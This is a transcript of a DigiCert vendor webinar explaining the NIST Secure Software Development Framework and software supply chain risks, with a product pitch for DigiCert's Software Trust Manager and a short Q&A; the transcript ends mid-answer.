Video: Implement NIST Secure Software Development Framework Best Practices Without Killing Your CI/CD Productivity | Duration: 3608s | Summary: Implement NIST Secure Software Development Framework Best Practices Without Killing Your CI/CD Productivity | Chapters: Welcome and Introduction (25.14s), Introduction and Overview (99.284996s), Software's Pervasive Impact (174.44s), Software Supply Chain Challenges (301.015s), Software Complexity Challenges (453.07s), Software Supply Chain (715.265s), Software Development Vulnerabilities (842.41003s), Organizational Security Challenges (1182.555s), Preparing Security Policies (1631.5s), Defining Security Roles (1727.345s), Automating Security Policies (1829.61s), Securing Development Environments (1941.59s), Artifact Integrity Protection (2054.835s), Software Transparency Requirements (2199.2798s), Automating NIST Practices (2358.0352s), Secure Build Practices (2489.385s), DigiCert's Software Solutions (2612.255s), Conclusion and Q&A (2911.67s)
Transcript for "Implement NIST Secure Software Development Framework Best Practices Without Killing Your CI/CD Productivity":
Alright. I think we'll get started. Hi, everyone. Welcome to today's webinar on implementing NIST Secure Software Development Framework. My name is Maddie, and I'll be your producer today. Before we get started, I just wanna go over a few housekeeping details. I wanna draw your attention to the engagement panel on the right hand side of your screen. Please take a moment, locate the q and a feature, and feel free to ask any questions that you have. Our team of experts will monitor those questions during the webinar, and we'll do our best to address them. If you have any technical issues during today's session, please check your Internet connection and then try to refresh your browser. Chrome generally works best for this platform, but if you have any problems, feel free to email me at webinars@digicert.com, and I'll do do my best to help you. Finally, please note that this webinar is being recorded, and we will send you a link to the recording after the webinar. It's my pleasure to turn this over to Eddie Glenn, senior manager for Software Trust, here at DigiCert. Eddie has been a a great asset here for us at DigiCert, and he has been developing software for longer than I've been alive. So he hopefully, you'll learn a thing or two, from Eddie today. I'll turn the time over to him. Thanks. Thanks, Maddie. I didn't realize you're only 15 years old, so, you look great great for your age. No. Hi, everyone. I'm I'm really excited to be here. Software development and secure software development are passions of mine. And, I know that this topic, can sound a little dry at least from the title perspective, but I'm gonna try to keep it, keep it fun today. And I I really hope that you guys, learn something from this. And, as Maddie said, please be sure and ask questions. I probably won't be able to see those questions until we get to, the end, but, definitely ask them throughout. So I'm gonna cover a couple of things. First, just quick introduction of why are we here, why are we having this conversation, and then some of the challenges that organizations have. Then I'm gonna dive into what the NIST, secure, software development framework is, talk about the importance of how to leverage automation to, implement some of those those best practices. And then finally, at the very end, I'll just I'll mention a a few ways that Digicert can help you achieve those things, And then, we'll we'll get to the summary and and q and a. So I remember when I started to develop software, it was I was a single developer of our product. We wrote in a assembly language. The development time was about a year. You know, if we were to put out new releases, it would be about a year. And, software wasn't on phones at the time. Software wasn't on tractors at the time, but it's all changed. In 02/2011, some essayist, wrote that software is eating the world. And friends, I I say that, you know, in 02/2024, software has has eaten the world. No matter where you look, no matter what industry, you're involved with, software is a key component of how that industry operates. It's either something that your company delivers to your customers. It's something that your company depends on for its infrastructure, or it's the product itself, even even live entertainment. You know, software is a key component of live entertainment these days. So, you know, that's one of the things I really like about being able to talk to the industry, the market, is that it's such a wide variety of people that are developing different kinds of software applications and are using software in different ways. But software definitely has, has, has aced the world, and practically every business now is a considered a software business. But there's a problem with this, and that is, the bad guys, hackers, state sponsored, cyber terrorists, cyber criminals, They're trying to attack that software infrastructure, and and they're doing it in extremely novel, very innovative ways, and they're hard to stop. And, you know, this slide, you know, just shows some of the examples. These are all victims. I really don't like the victim shame because any of us, is at risk of of having, our software be under attack. No matter if you're a small company where you only have a few developers or you're a mega corporation and you get impacted because some software that your company relies on was infected. These are all great companies, and they're all, have had issues with with their software being being attacked. And that's why frameworks like NIST become so important because we have something to fall back on in terms of what are what are the best practices? What are others doing in the industry? What does an organization like NIST think, should be done to help secure software development? And, I mean, just to give you the an idea of the magnitude, ninety one percent of businesses last year reported that they had a software supply chain attack. That's a huge number. I before I saw the statistic, in my head, I thought it was probably 50%, maybe 60%, but I I was really surprised that data theorem, is reporting 91%. But you gotta step back for a minute and ask why is it so hard to stop these attacks? And I think there are several reasons for it. First reason is modern software is complex, and I've I've got a slide that I'm gonna switch over to in just a minute. But, you know, when I was developing software when I first got started, it was simple. All the software came from my head. It didn't come from another person. It didn't come from a third party. It was hosted in a physically secure device, so there's no way that someone on the Internet could come in and and and hack it. It was, you know, a couple of thousand lines of code, so relatively small. So, you know, we had five people reviewing the code that I wrote. So it's very safe, very secure, but that's not how modern software is today. And and there are so many things that modern software, characteristics of modern software that that can enable software supply chain attacks. The other issue I think that we we all experience is that even though we may have very well funded development teams, product development teams, software teams, they're focused on generating revenue. So they're focused on new features, competitive aspects of their product, getting it out to market faster. And what happens often is that they skip on security. Or there are security teams in place in an organization, but they're, woefully understaffed. So we'll we'll talk about that in some details. And then just the different kinds of attack services as we'll see in in just a few minutes. It's extremely broad. So that means, you know, in the in the old days, you might have one tool that helps prevent, you know, a a certain kind of bug or a certain kind of attack. But today, the attacks are so broad that it it requires multiple best practices and multiple steps to prevent those kind of attacks. So I talked about modern software being complex. Here's a component of software that a lot a of software companies use. It's, HTTP, from Apache, the the HTTP server. It by itself has 2,000,000 lines of code. This is kind of a a picture of what some of the dependencies within HTTP server looks like. I think the last time I looked, about 600,000 people have contributed to the source code, and this is a component that goes into someone else's, you know, application. If you're if you're developing web soft software, you may be deploying this on your web server. So, So, you know, this is considered part of your application because that's how your customers see it. So already, you have 2,000,000 lines of code that you have no idea what's really inside of it. You have no idea who's contributed to it. You have no idea as to what has been done to that software. And and, you know, we frequently hear about vulnerabilities that were either intentionally added in or or perhaps unintentionally added in and then later exploited. But if we think about just your software that your company develops, it's very common today to have development teams spread around a company geographically. Some in The Americas, some in EMEA, some in Asia Pacific, all over. You know, I've talked to customers where they have 50 different development teams around the world, with thousands of software developers. And just that level of complexity makes it really hard to secure what every one of those individuals is doing. So that that adds to one of the things that makes securing this, very difficult. Extremely large code bases. I mean, you know, in the old days when I was writing software, a couple of thousand lines of code, maybe 10,000 was considered extremely big. But when we take into account of the number of third party libraries that we're pulling in, the amount of code that we're writing, object oriented techniques where we're, you know, making one version of a of of a data structure like another version, but but different, open source software, software that's coming from third parties, source code that's coming from third parties. It's an extremely large code base, and that really opens up the the attack vector. It goes an attack could happen to any part of that software. It's also being deployed on multiplatforms. You know, I talked about when I deployed my my little software application, it went into one physical device, physically isolated from every other physical device. Today, that's not necessarily true. People are writing software that's going to run on a Windows machine or it might run on a Mac OS machine or it might even run on a Linux machine or run up in the cloud so there's software that's going to have to run into these different environments. It's also a multi development environment So, you know, some of your developers are using a certain set of tools to develop a Windows application and might be using another team's using a different set of tools to develop a Linux application or an iOS application. So, you know, the even the development environments are are complex. And then we talked about the supply chain being large, and then there's lots of dependencies. And known dependencies are not bad. We, you know, we know about them at least, but I think what we'll uncover is that there are a lot of dependencies in our software that we just aren't aware of. And then the other thing that's changed is that, we're now employing methodologies like DevOps and and continuous integration, continuous development, which means that, we're expecting our our developers to to release new versions of software on a very frequent basis. You know, it's no longer once a year. You know, at some point, it became once a quarter then once a month. And now, you know, I talk to customers, and and they're doing it several times a day. And, you know, when you have that much happening, it's it's, you know, hard to implement security if it's not automated, which we'll we'll talk about in just a few minutes. And then the other issue, that adds to the complexity of software is that it's used globally anymore. It's no longer, you know, an application's written for an American audience or a French audience, but it's it's an application that's probably gonna be used around the world, especially with cloud native platforms and and software as a service. So that means that we have to do more to our software to ensure that it needs certain regulatory, compliance issues, wherever it's being used, globally. So I talked about software supply chain. I just wanted to dig into that just a, a little bit more detail because I know a lot of you, especially on the security side of the house, you may not completely understand what's happening and what goes into into building software. So any software application usually pulls software components from one of these four areas. From internal, it's gonna be new stuff that's being written in house. It might be stuff written by your team in India and stuff written by your team in in Florida, but it's, you know, still developed in house, so you have a fair bit of control over it. More than likely, though, you're gonna have a large component of software that's considered legacy or old. So old being more than, like, three or four years old, and that means that the original developers are probably no longer around. So that means the implication of that is that there's a lot of unknowns about that software. So that's kind of what we see here on the right hand side of the screen, you know, software that's coming from internal sources. But then we've got software that's coming from external sources. That could be open source software, which is highly leveraged these days because it doesn't increase our productivity. It allows us to create much more complex software applications without actually having to write that software because we can reuse these commonly commonly available components. And then there's also lots of third parties, commercial software, things that might come from Microsoft or libraries that might come from from Apple that supports graphics and, you know, things like that. So the supply chain is very complex, and the thing to keep in mind here is that an attack can happen in any of these quadrants, and it potentially can impact your application, which means it's gonna even though, you know, let's say that, there was a vulnerability in the HTTP server and that was an open source concluded that that you're using for your application. To your customer, it doesn't really matter that that came from open source software. Their perspective is you infected them with malware in some way because, you know, what you deployed wasn't, considered safe. So that's why it's really important for us to keep this in mind that this software is coming from multiple locations. And this I'm kind of embarrassed to to show this diagram because it's so basic. But again, as a software developer, it's basic to me. But when I talk to a lot of, our security customers and security people, they don't completely understand how software gets made. And so sometimes I find that it's useful to kinda get us all on the same page because it helps to explain how these attacks work And just say that there's a process. You write code. You build it. You package it. It gets sent to a customer. And then with DevOps or continuous integration, continuous development, this process just repeats over and over and over again. And then there's another little, aspect to this, and that is there's third party code gets pulled in. Sometimes it's pulled in and modified. So, you know, it's back in that writing code part or it gets pulled right into the build, process where, you know, nothing's done to it. So this is very high level, very simplistic view of how software gets developed. But this is what we need to be aware of is that all of these locations throughout this process are possibilities of attack surfaces for cyber criminal or cyber terrorist. For example, we've talked about the fact that we use, leverage open source code or third party code. There could be intentionally hidden malware in that code, and it's just up in some repository that your developers are downloading. They you know, because it's so much code, they don't have a chance to really go through it to analyze and see if there's malware present present there. There, could be unknown vulnerabilities in that third party code, or it could be a compromised dependency. Now this starts to get a little bit, you know, complex in the software development side, but think of it like this is that if I download a package that creates a circle on my screen, that's that's all it does. But then it pulls in another package, and I'm not aware of that other package because it needs that circle to be drawn with, you know, a particular hardware driver, then all of a sudden I have this dependency that I'm not aware of, and that dependency could also have the same things happening to it. So you can see it. It just kinda builds and builds and builds. So it it it can it become really nested. So this compromised dependency becomes really important. There's also the possibility that someone could break into your development environment and actually compromise the source code that your developers have written. This is one of the there are many things that happen with SolarWinds, but this was one of them. Someone was able to get credentials into their development systems, and they actually changed source code to add in malware. And no one, within SolarWinds understood that. So that that's another way, you know, for a change, or a vulnerability to to get added in. If we look at the build, this happened recently with, a video card company called MSI. They, released their drivers and firmware for their particular, video chip, and they didn't realize that they had stored private code signing keys, from that were provided by Intel into their drivers. So it exposed those keys, which effectively allows a third party to sign software and make it look like it it came from Intel. So there's that possibility of exposed secrets, and this happens more frequently than not, especially since we're leveraging automation. Automation to, you know, make things go faster. And then the last aspect actually, it's not the last. It's compromised builds. Yeah. I wanted to talk about that before the last one. An attacker could go into your build system. You know, build system is usually a set of computer instructions, a script that says pull these pieces in from all these different locations, and then this is what we need to do to to build the thing that we're gonna deliver. Well, they can actually modify that. So instead of pulling in the third party code that you've already vetted and you think is secure, they can modify your build and change that. So that this happens frequently, and and there's evidence, public evidence of, you know, of a compromise that that happened using that technique. And then finally and and when I say finally, this was actually the first kind of, I think, cyberattack on software was changing, binary images. If you go back to the days of when it became kind of a big deal that we would upload, programs to the Internet for other people to download, we quickly found out that, malicious actors could go in and modify that executable, add some malware to it, and then people wouldn't know if it came from you or came from them. And that's when we began using, something called code signing to ensure that the software is authentic, that it comes from where it said it comes from, and it's not able to be tampered with. So that was kind of the end of the process here, but it was, you know, it's one of the more older techniques used to attack software supply chains. And then, you know, kind of ends up the our customers or the users. So the users could be your customers could be those within internal to your organization or getting customers that you sold to, or it could be partners or other pieces of your your extended ecosystem. They need to know what was really delivered to them. You know, you you you claim that you have no bugs. You claim that you have no security flaws. You claim that, you know, this is the list of components that are in in this, software package that you delivered, but is that really true? So there's, you know, that that issue as well. So extremely broad attack surface. Then I wanna move into organizational challenges. So we've talked about software complexity, but along with software complexity is this people complexity. So we've got teams of developers that are using different sets of tools. So it might be a a team that's developing mobile software, a Linux software, Java software. They're using different kinds of tools. They're do doing different methodologies. The one thing they do have in common is they're being pressured to do more in less time. So you're gonna get out more new features, but you have less time to do it. And then they also have this issue of security is probably low on their list of priorities of things that they're focused on. But then we have to think about the bigger organization. So if you work for a fairly large enterprise, you're probably gonna have a team of people that handle your PKI admin stuff. So, you know, if you have POS certificates for your your websites or your your data servers, this team is probably, you know, helping helping the IT, part of the company make sure that those certificates are valid, or they're helping individual software teams ensure that they have the right code signing certificates. You hopefully have a a team that just focused on product software and enterprise security. So, you know, they're the ones who are thinking about that attack surface. So if even if you're a developer, you're not thinking about that, this team is. And so they're looking at, well, how can you what can we do? What do we need to have our software development teams do to ensure that, our company is safe from from these kind of attacks? And then you have probably another team that doesn't get involved too often, but when they do, it's really important because they're, either an audit team or they're trying to comply with, external regulations or it could even be internal compliance. But the thing about this is that these teams are all very isolated. In in a traditional environment, they're isolated from what's happening within development, and there's often a many to one relationship. You know, you've got many development developers. You have thousands or tens of thousands of developers, but only a few people that support p k PKI or a few people that do this product security. Well, how can they enforce product security policy across that many developers? So this is an organizational challenge that I think is a significant trip contributor to what, causes, weak spots for for supply chain attacks to occur. And one of the there are actually four outcomes, I think, from this setup, you know, between soft, the complexity of modern software to the people organization and and the organization is that the people down here who needs to have broad visibility into everything that's happening up here, they don't have that visibility. They don't have that enforcement. Let's say that, the security team wants every software product that shipped to be scanned for vulnerabilities and malware. The only way that usually, the only way they can enforce that is to write a policy in in some document, and then they have to counter the fact that these teams are gonna follow that document. That doesn't happen. It it people forget. People intentionally skip it. So there's really no way for these people today to enforce this, and they don't have that visibility. If if there is a vulnerability discovered, externally and it's reported to this team, there's probably no records centralized records for them to go and say, well, where did this actually happen? And this is one of the things that the industry discovered with SolarWinds. Great company, but they just did not have that visibility across all their different development teams. So when they went to try to remediate and figure out what happened, it was a major challenge that took a lot of forensics. And if they had some infrastructure in place where it would record these activities and these security activities, it would have probably have been easier for them. Successful tampering, you know, we talked about the fact that attackers can can change source code. They can change build scripts. They can change configuration files. If those are changeable and no one notices, that's gonna be a big problem. And so that means they've successfully tampered with your your software, supply chain. Or, you know, we talked about the threats, hidden threats that are either in your code or, in third party code that you've used. And then finally, we get this issue around lack of transparency. And a lot of regulations, in multiple countries now, including the the executive order that president Biden signed a few years ago, is basically requiring that software providers be very forthcoming with what's in their software, and they do that through something called a a s SBOM. It stands for software bill of material. It's basically just a recipe list of all the software components that's in it. The intention of this is is to be basically allow a user software to know is, the software that I'm using, a vulnerability was just discovered last week. Am I impacted, or not? But in today's organizations, there's that that transparency is not there, so it's really hard to to, provide that, for your customers. Okay. So I just talked about a ton of problems and ton of scary things, and there are lots of ways to address those. And and and I find this really encouraging, and I hope you do too. There there are different frameworks available. I happen to pick this one because I think it's generic. I think it has great insights, some great, suggested best practices. And, you know, if you work in automotive, you probably have your own you you have your own framework that that you need to follow to help with regulatory compliance. If you work in, medical, the FDA has a framework. But the thing that I've noticed with all the frameworks is that there's a lot of commonality between them, you know, and the best practices don't vary that much. So I like this particular framework. It's a your software development framework that, NIST put together as a result of that executive order that I've mentioned, from president Biden. And I think it's just it's a very good general set of best practices, and I just wanted to walk through some of those. I'm not gonna get into a lot of detail because that's when I think this this webinar could get really boring, but we're we're gonna provide you the slide deck, so that you have it. And then after I walk through some of the best practices of things that you should be doing, then I I want to spend and and close with just a few minutes of how how Digicert can help you with some of those things. So if we look at the software, secure software development framework, they basically break it into four sections. One is you prepare the organization. That makes sense. It's just like, you know, if you're writing software, you do some designing requirements work first, so prepare the organization. Then you protect the software. So make sure that you have an infrastructure in place that's hard to, infiltrate, to penetrate. So there they have a lot of best practices around. What can you do to protect that? Then they suggest and, that you produce well secured software. You know, obviously, that that that should be a given. It's it's very obvious, but it's it's part of what they recommend, and they have some some good, best practices for how to do that. And then finally, they know that even if you follow all these best practices, it's not gonna stop a % of the problems. So you need to have a a system in place for how are you gonna respond should a vulnerability or a threat be discovered after you've released the software. So we're gonna walk through each of these kind of at a at a high level. And, again, there should be a lot of text on the slide. I'm just gonna focus on what I think are the most important aspects, but you'll have the slides to reference later. So preparing the organization. If you're on the soft software development side of the fence, this should be really obvious. You know? Before you start writing a software, you you do a design. You do some requirements. And that's all that this to say in here is that define what the security policies are upfront before software development begins because there are slots that can be done during the software development process that can take into account some of those security policies. This includes the infrastructure that you're gonna use. Are you gonna use GitHub? Are you gonna use GitLab? Are you gonna deploy to, Azure or AWS? Are you gonna use the compiler that's provided by Microsoft or the one, the Java, compiler for that's provided by Oracle? Are you gonna use this set of test tools or that set of test tools? What configuration management tools are you gonna use? All of those things, that's part of your infrastructure. Where are you gonna build your software? It's gonna be built on an internal data service. It's gonna be built in the cloud. How are you gonna protect that? And then this how are you how what should the security policies be for not only the software that your organization's writing itself, but any software that's being written by third parties? And we know that you're gonna have software that's included, that's come from third parties. So you need to know in advance what your own internal security policies are so that when you inform your software development teams that, okay, if you're gonna use third party open source, you need to make sure that they do this, this, and this, and this because the these are our requirements for for security, and we need to ensure that our providers are are doing the same thing. Then this this aspect also in in my mind, it seems really obvious, but I know a lot of customers that I talk to, they don't do it like this. But it's defined security roles and responsibilities. You know, this is basically boils down to of of, least privileged access. Everyone shouldn't have access to everything. I'll use code signing as an example. There should be a role that says this role has access to this particular code signing key. There should be a completely separate role that says this role has the authority to say that this key can be used when it needs to be used. Very separate. This role has the ability to compile this application and build it and produce it. This role has does not have the ability to build that application. It has a different application as the ability to. And then you set up these roles and responsibilities throughout the organization. Codesigning is one aspect. Being able to, create an, a software bill of materials is another kind of role that should be reserved for very specific individuals. And when you start to tighten up who has access to what, it starts to secure your infrastructure. Who has access to modify the build scripts? There probably should only be one person, and that should that should be especially protected. So this is saying, you know, as part of this preparation is you have to define those roles and what the responsibilities are. And then, you know, this is this also is kind of obvious, but Vowel stated you need to select and utilize tools that support your software development process, and you should select them so that they do mitigate some of the risk. You they definitely need to be automated and provide automation. So, you know, I talked about, security policies. If they're written down in a word document and then you send that off to, all of your developers and say you need to follow these security policies for how you develop software, no one's gonna do it. They're gonna either forget it intentionally or they're gonna forget it unintentionally. Instead, you need to have tools in place infrastructure in place that automates the enforcement of those policies. You also need security policies in the tools. So, you know, if if if your software relies on a particular software development tool, that software development tool becomes as critical as the software that you're developing. So it needs to have the same kind of security policies in place for it. And then generate intermediate artifacts to support your security policy. Again, you all go back to the example of SolarWinds. They didn't necessarily create internal artifacts to be able to see a path of how did the cyber criminals go from point a to to getting to their objective at point c. And it's really important to to make sure you build this into your process that you have intermediate steps all along the way. You're saving those artifacts so that if there is a later breach, there is a way to come and, and remediate and and discover that. And then, the the last part of preparing the organization, I'm gonna move on to the next section, is to find criteria, especially things around, like, KPIs to help manage your risk. You know? You know, the common one is how many bugs do we you know, are we allowed to how many p one bugs can can the software be released? But there's also, if you're doing vulnerability scanning, you're gonna have to have a policy around, you know, do we allow any software to be released with a known, threat in it, a vulnerability in it that's, you know, p one, p two, p three level. So these are things that we need to define upfront. You need to define upfront what the process is for how do you get an exception if, like, an exception is needed, who approves that. Again, we go back to tool automation. These things need to be automatically enforced so that they're just part of the build process, and then tools to help with that automated decision making process so that we we we don't get in the way of the developers. Only if there's a problem do we get into the way of developers for releasing. And then secure, your software development environments. You know, one of the the newest things is to use ephemeral, build platforms. So these are cloud based platforms that exist only for the duration that software is being built. And as soon as the software is done being built, it's taken back down, reset to a known state. Then the next time the build happens, it comes back up again. You separate systems out from production use and and development use and and test use. Have them separate it because, that helps with isolation, minimize human access to the tool chains that are that are used. You know? Only a few people should have the authority to install a new version of of a critical software development tool. Okay. So how do we protect the software? So this is now we're in software development. What are some of the best practices for protecting, the software? In the early days, I talked about how, you know, when when the early attacks was to modify that final executable at the end, and we responded by creating code signing that allowed us to digitally sign that final executable so that it couldn't be tampered with and that the consumers of it would know that it was authentic, that it came from the the source that it claimed to come from. That's no longer enough. You know, we we if you think back on the the process, the the build process, you know, you got people writing software, they build it, they package it, and so forth. Artifacts are are generated throughout that entire process. And as we've talked about, attackers are focused on any part of that process, so you really need to create a way to ensure that all those artifacts as they move through your software development, life cycle, they can't be tampered with. So this includes source code, intermediate executables, library scripts, configuration as a service. I got that misspelled. CAC should be CAS, configuration of service. So a lot of, a lot of tools these days, you configure them through a script, basically. These should all be stored in a repository. They should all be signed digitally signed so they can't be modified unless we know that they're supposed to be modified by an authorized person. Extremely important to prevent some of those attacks that have happened, throughout the the software supply, the software development life cycle. And then, obviously, some of these things like, you know, making sure that we have reviews of of both the owners or the originators, the authors of code, of these these, intermediate artifacts. They should review and approve any changes, use code signing to protect the the artifacts themselves as well as the integrity of the executables, and the NIST actually calls out using cryptography. So, again, that goes back to code signing. So, cryptography is is a great way to prevent these things from being tampered with and and identifying and and knowing when they have been tampered with. So doing that is kind of preventative, but then it's also useful to to provide some ability, and a mechanism to verify the integrity of of a software release afterwards. For example, when we verify, we when we cosign the final executable, there's a hash that's associated with that executable, and then the cosigning signature should, you know, be able to identify if it's been changed or not. But being able to publish the hash so that an end user can actually compare it as well becomes important. And this is not only just important to the final users, but for all those intermediate artifacts throughout the software development life cycle. It's just a way to add, further further verification along the process. And then this one, I think, is really important, and it's it's a change, that's that's happening across the industry. The FDA is requiring it now for medical device software. The US government's requiring it for softwares that they find that they use in their criminal systems, but they want software transparency for any software that they use. So as a manufacturer software, you need to be able to provide that SBOM, that software bill of materials that explains everything, every component that goes into your software. If you've written it or if it's come from a third party as open source or if it's a third party as as a, binary library. And this has to be shared with, with, the consumers of that software. It's it's important because it helps helps protect the integrity of the software development life cycle. So, you know, one of the things I'll mention here that makes this, important is that SBOMs are going to become a critical part of what you deliver to your customers. But what happens if a hacker comes in and they modify an s bomb to let's say they they did that they were able to successfully insert a vulnerability or hide malware. They could go into that s bomb, change it, and delete it so it's not not seen. So, you know, that becomes an, an artifact that also needs to be digitally signed so they can't be tampered with. And this this area here, produce well secured software. You know, this also seems like an obvious thing to do that everyone should be doing it, but, this has some some best practices around this. One of them is utilize threat modeling, threat detection, attack modeling, attack detection, vulnerability, detection. You know, because we are relying so much on third party software, we need to make sure that, we are using tools that can analyze that software both at the source code level and at the final binary level to ensure that, at least, there are known known threats that we can identify them. If there are aspects of the tools that you use that help increase security, take advantage of them. Make sure that your developers follow secure coding practices. This coding practices should have been defined upfront in in the preparation part. Likewise, use code reviews to help ensure that this coding practices have been followed. And then finally, how do how does one respond to a vulnerability? We need no matter how many precautions we take, there is gonna be something that happens. Like, no matter how well you test your software, there's always gonna be a bug in it. So NIST recognizes this, and they have some best practices. They heavily rely on the fact that s bombs are gonna be created for all the software that's consumed. Because if there is a vulnerability that's discovered, in a common component that's used across the industry, then everyone's gonna be able to to to know if their their software has been impacted by that vulnerability. There are databases public databases now that track these vulnerabilities. And then, this is recommending that you use tools to automate this because, you know, it's obviously not something that can be done manually. And then create plans for you know, if there is a vulnerability discovered, what is your company gonna do? How do you notify your customers? What what steps are you gonna take to remediate that? And just to kind of summarize what NIST is saying, automation is so important for this to work. You know, we're dealing with so many lines of code, so many different developers, such short release cycles. There is no way that we can have security built into our our software development life cycle if automation isn't the main driver behind these tasks being done. So, you know, this document is a great document. I really would encourage you to download it to read through it, but it's gonna be really hard for you to implement any of these if you don't have the infrastructure in place that automates, the tasks that are described. And this kind of you know, if if I were to have, you know, one slide that says this is what every development organization should be doing as best practices that kind of summarizes what the NIST framework is, it's this. It's make sure that as part of every release cycle, you're you're doing threat detection, you're scanning for threats, you're scanning for malware, You're securely signing software artifacts, you know, like source code and build files and scripts and things like that as well as the final software executables in a way that that process can't be, attacked, and you're generating the transparency for the software you produce. And if this is done automatically, it's gonna do a lot towards protecting you from the software supply chain attacks that are happening, using many of the the recommended NIST protocols. And if we were to take this and kind of dive down into a little bit more detail, these are some, you know, very specific things that that are best practices that this doesn't necessarily call out in these terms, but this is what this means by it. You know, they talked about assigning intermediate artifacts. So, you know, what that means is that when you go to submit code into your source code in your repository, you sign that. Maybe you run an automated scan on it to make sure that there are no known threats or vulnerabilities in there. During the build process, you make sure that your builds are reproducible so that, you know, if you build with the same set of components, you know, this hour that if you don't change anything next hour, it's gonna build and the executable's gonna be the exact same executable. I talked about ephemeral builds. So you don't keep your build structure on your build environment online all the time. You only fire it up when, you need to actually do a build. You're also doing threat detection during this process. During the build, you make sure that, you can keep any key, like private code signing keys or other private data or other secrets, safe and secure, and it's not included accidentally into your build images. One of the things that happens so often, especially around, some GitHub projects is that people will upload those private keys to GitHub and then they become public, so they're no longer private. Again, rely on automation for this. Do logging is the build. So, you know, every part of your bill process, you you should have a wall created that that tracks, you know, I've done this, this, this, and this. Do static binary analysis. You know, we talked about doing source code scanning here, but there's audit code that gets built pulled into your final executable that's, binaries. So source code analysis isn't enough. You need to actually do binaries, static binary analysis as well, and you gotta sign the software. And then when you package it up, you should create an SBOM. So it's, you know, quite a set of very practical things that can be done that is gonna go a long way to to help your organization, stop a software supply chain attack. And then I said that I I wanted to end on just quickly how can Digicert help you with this. We have a product, that's called the software trust, trust manager, and it's really built for solving these problems in this picture, you know, where the organization doesn't have visibility or or centralized enforcement. It doesn't have a way to help prevent tampering anywhere in the process, be it source code artifact, build script, or final executable. It's missing, you know, threat detection. It doesn't have threat detection, and and it doesn't have the ability to do that lack of transparency across many different organizations within development organizations with only a small team of people that are kind of oversight. So what we do is that we provide a product, software trust manager, that does provide that enterprise wide visibility enforcement. It provides verifiable authenticity throughout the software development life cycle. So that means that we can provide, verifiable code signing certificates, private code signing certificates, and then manage those keys in a secure way that's, industry compliant so that your development teams have easy access to them, but it's controlled and and extremely secure. As part of our platform, we can integrate in that threat detection both at the source code level and at the binary level so that it's just part of the build process. It doesn't slow the development teams down. They don't have to think about, well, I now have to do this extra step. It's just part of their build process. And then, have the ability to generate SBOMs, software builds materials as a part of that process. And then if we look at, you know, what software trust manager does in a bit more detail, we think of it in terms of kind of three pillars of of functionality that we provide. One is enterprise secured code signing, the other is enterprise software security, and the third pillar is enterprise software transparency. And from a secured cosigning standpoint, cosigning is a great technique, you know, and this calls it out. But if you don't protect the assets that are needed by the cosigning infrastructure, it's easy for an attacker to compromise that infrastructure, then it's no no longer useful. So DigiCert is well known for its trusted public cosign certificates. We provide the ability to store all your private cosign keys in a secure FIPS one forty two compliant storage, and then we automate the key management and the certificate management for all of your developers. I mean, another source of of things that happen is that developers don't always know, you know, what are the best practices for how to manage their managing, their certificates and keys. Then from an enterprise security standpoint, we give that small team of security professionals the power to have visibility across the entire enterprise no matter what this development teams are using in terms of tool sets or where they're physically located. They have a central pane of glass to see all the security artifacts that are created as part of the bill process. They also have the ability to define this is what our security policy is. They can translate that word document that has security policy and and put it into a a tool that can automatically enforce that across their organization. If they want to have a policy that says every time you do a software release, you have to run a a threat, an hour scan, that could just be part of the process, and, that's that's integrated into the platform. And then they define what's needed for a release. These are all the things that you have to this is your checklist of things that need to be done for a software release, and then you can automatically enforce that all those things are indeed done so that a development team just can't, you know, decide not to do it. And then finally, around enterprise software transparency, we provide that enterprise visibility that's really needed for compliance, both internal compliance as well as regulatory compliance. So it's the set of logs that, you know, will help you remediate any issues that that happen downstream. It's a set of of, a log of all the activities, the signatures that got generated. It's the software bill of materials that's generated for every software release, and then it's irrefutable. It's a record of what's happened so that this becomes your evidence that you often need core compliance. And then by using software trust manager, organizations are gonna protect themselves from software supply chain attacks. They're gonna reduce risk of releasing compromised software. They're gonna increase and drastically increase the efficiency of not only their software teams, but their PKI team, their develop their, security teams, and their compliance teams. And the great thing about software trust managers, it works for many different kinds of software development environments and programming languages and types of software that are developed from embedded software to enterprise software to cloud native software. Doesn't really matter what platform. So after the webinar, I believe we're gonna send out an asset that helps translate some of the capabilities that are in software trust manager to the best practices in the NIST framework, and that will help you understand this is how Digicert can help you achieve those best practices for NIST. And with that, I just wanted to thank everyone for your time. I'm gonna switch over to the question window and see if any questions have come in. And, I know I I talk kinda fast, but I get excited about this stuff. So thank you very much for your attention. Thank you, Maddie. We had a couple of great questions come in. To start off with from Steven, how does this version of, SSDF 1.1 relate to the new NIST two point o? That, we have not dived into yet, but it's it's gonna be an inter iterative, iteration on 1.1. So 1.1 is what we've been working towards, but I know that two point o is is in development. Great. And kind of building off of that, do you think that, this NIST framework is the best framework that we should be following? You know, that that's a good question. I like it because it's general. So I talk to lots of different industries, but I would say that the best framework is one that's specified by your industry if if there's a regulatory agency that's, you know, regulates your industry. But I like this one because I can talk about a broad set of topics that generally applies to everyone. Great. This one here. With with SBOM analysis, do you identify libraries that are internal to the organization software, not off the shelf or open source? It's both. So, our binary static analysis will look at the final binary image, and it will identify software that was developed internally. It will just, identify software components that have come from external sources. Be those external sources, open source software, or third party commercial libraries. Great. Alright. We just have a couple more here. Our developers are already cosigning. Tell us a little bit more how the solution improves what they already do. K. That's that's a good question and one that I get asked a lot. So I mentioned I mentioned a few minutes ago that code signing is really effective as long as your code signing infrastructure isn't compromised. So what could happen in compromise it? One is, the private code signing keys that are secrets are become no longer secret. That's what happened with the MSI, the MSI breach last year. And developers frequently don't appreciate the seriousness of the consequences that could happen if those private code signing keys become compromised. So what do they end up doing frequently? They put them in places where it's convenient for them to access. So that could be on a build machine, that could be on their laptop, up in the cloud, and then some cases, they've even put them into their source code repository that gets uploaded to GitHub and then then everyone has visibility to them. So even though the active code signing is secure, they've just compromised the infrastructure around code signing. So when Digicert talks about secure code signing, we're talking about securing the infrastructure. So that is doing a couple of things. One is making sure that the keys are secure. They can't be accessed by people that aren't authorized to access it. We can secure the keys based on, what roles and responsibilities have access and if and then require for someone to approve for that key to to actually be accessed. We can ensure that there's a if there's a policy around only these kind of certificates are used or only this kind of key configuration is used, We call some encryption level strength. That can be done. I know that PQC comes up a lot as as something in the future by having a secured cosigning infrastructure in place, making that transition from regular cosigning, certificates to p q PQC, enabled certificates is gonna become much easier because you have infrastructure in place to to help that happen. Excellent. Alright. I think we have time for one more question. How does secure code signing differ from Azure Key Vault? So Azure Key Vault, you know, is designed for storing secrets, but it doesn't necessarily provide the infrastructure to control the access to, when that cosigning key can be accessed and how it can be accessed by whom, where, and when. So these are all important aspects to ensure that just to 